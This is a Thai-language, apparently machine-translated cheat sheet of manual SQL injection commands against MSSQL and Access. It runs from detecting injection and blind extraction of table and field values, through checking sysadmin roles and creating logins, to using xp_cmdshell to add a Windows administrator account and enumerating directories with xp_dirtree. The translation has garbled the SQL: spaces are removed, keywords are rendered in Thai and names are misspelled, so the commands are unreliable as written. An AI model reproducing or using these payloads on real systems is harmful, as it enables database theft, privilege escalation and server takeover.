ฉันจัดเรียงคำสั่งสคริปต์การฉีดด้วยตนเอง [พร้อมความคิดเห็น]

1. ตรวจสอบว่ามีการฉีดหรือไม่ และ 1 = 1; และ 1 = 2

2. การตัดสินเบื้องต้นว่าเป็น MSSQL; Anduser> 0

3. พารามิเตอร์การฉีดเป็นอักขระ 'และ [เงื่อนไขการสืบค้น] และ' '='

4. 'และ [เงื่อนไขการสืบค้น] และ'%25 '=' ของพารามิเตอร์ที่กรองในระหว่างการค้นหา

5. ระบบฐานข้อมูล

; และ (selectCount (*) จาก SYSOBECTS)> 0MSSQL

; และ (selectCount (*) frommSySoBjects)> 0Access

6. เดาฐานข้อมูล และ (SelectCount (*) จาก [ชื่อฐานข้อมูล])> 0

7. เดาสนาม และ (SelectCount (ชื่อฟิลด์) จากชื่อฐานข้อมูล)> 0

8. เดาความยาวบันทึกในสนาม และ (selecttop1len (ชื่อฟิลด์) จากชื่อฐานข้อมูล)> 0

9. (1) เดาค่า ASCII ของฟิลด์ (เข้าถึง)

; และ (selecttop1asc (mid (ชื่อฟิลด์, 1, 1)) จากชื่อฐานข้อมูล)> 0

(2) เดาค่า ASCII ของฟิลด์ (MSSQL)

; และ (selecttop1unicode (substring (ชื่อฟิลด์, 1, 1)) จากชื่อฐานข้อมูล)> 0

10. โครงสร้างการอนุญาตทดสอบ (MSSQL)

; และ 1 = (selectis_srvrolemember ('sysadmin'));-

; และ 1 = (selectis_srvrolemember ('serveradmin'));-

; และ 1 = (selectis_srvrolemember ('setupadmin'));-

; และ 1 = (selectis_srvrolemember ('SecurityAdmin'));-

; และ 1 = (selectis_srvrolemember ('diskadmin'));-

; และ 1 = (selectis_srvrolemember ('bulkadmin'));-

; และ 1 = (selectis_member ('db_owner'));-

11. เพิ่ม MSSQL และบัญชีระบบ

; execmaster.dbo.sp_addloginusername;-

; execmaster.dbo.sp_passwordnull, ชื่อผู้ใช้, รหัสผ่าน;-

; execmaster.dbo.sp_addsrvrolemembersysadminusername;-

; execmaster.dbo.xp_cmdshell'NetuserUserNamePassWordword

/เวิร์กสเตชัน:*/Times: All/PasswordChg: ใช่/passwordReq: ใช่/active: ใช่/เพิ่ม ';-

; Execmaster.dbo.xp_cmdshell'NetuserUserNamePassword/เพิ่ม ';-

; Execmaster.dbo.xp_cmdshell'NetLocalGroupAdMinistratorsUserName/Add ';-

12. (1) ถ่ายโอนไดเรกทอรี

; createTeabledirs (pathsvarchar (100), Idint)

; InsertDirSexecmaster.dbo.xp_dirtree'c:/'

; และ (SelectTop1PathsFromDirs)> 0

; และ (SelectTop1PathsFromDirswherePathsnotin ('เส้นทางที่ได้จากขั้นตอนก่อนหน้า')>)

(2) สำรวจไดเรกทอรี

; createTableTemp (Idnvarchar (255), num1nvarchar (255), num2nvarchar (255), num3nvarchar (255));--

; InsertTempExecMaster.dbo.xp_availableMedia;-รับไดรฟ์ปัจจุบันทั้งหมด

; InsertIntotemp (ID) Execmaster.dbo.xp_subdirs'c:/';-รับรายการไดเรกทอรีย่อย

; InsertIntotemp (ID, NUM1) Execmaster.dbo.xp_dirtree'c:/';-รับโครงสร้างต้นไม้ไดเรกทอรีของไดเรกทอรีย่อยทั้งหมด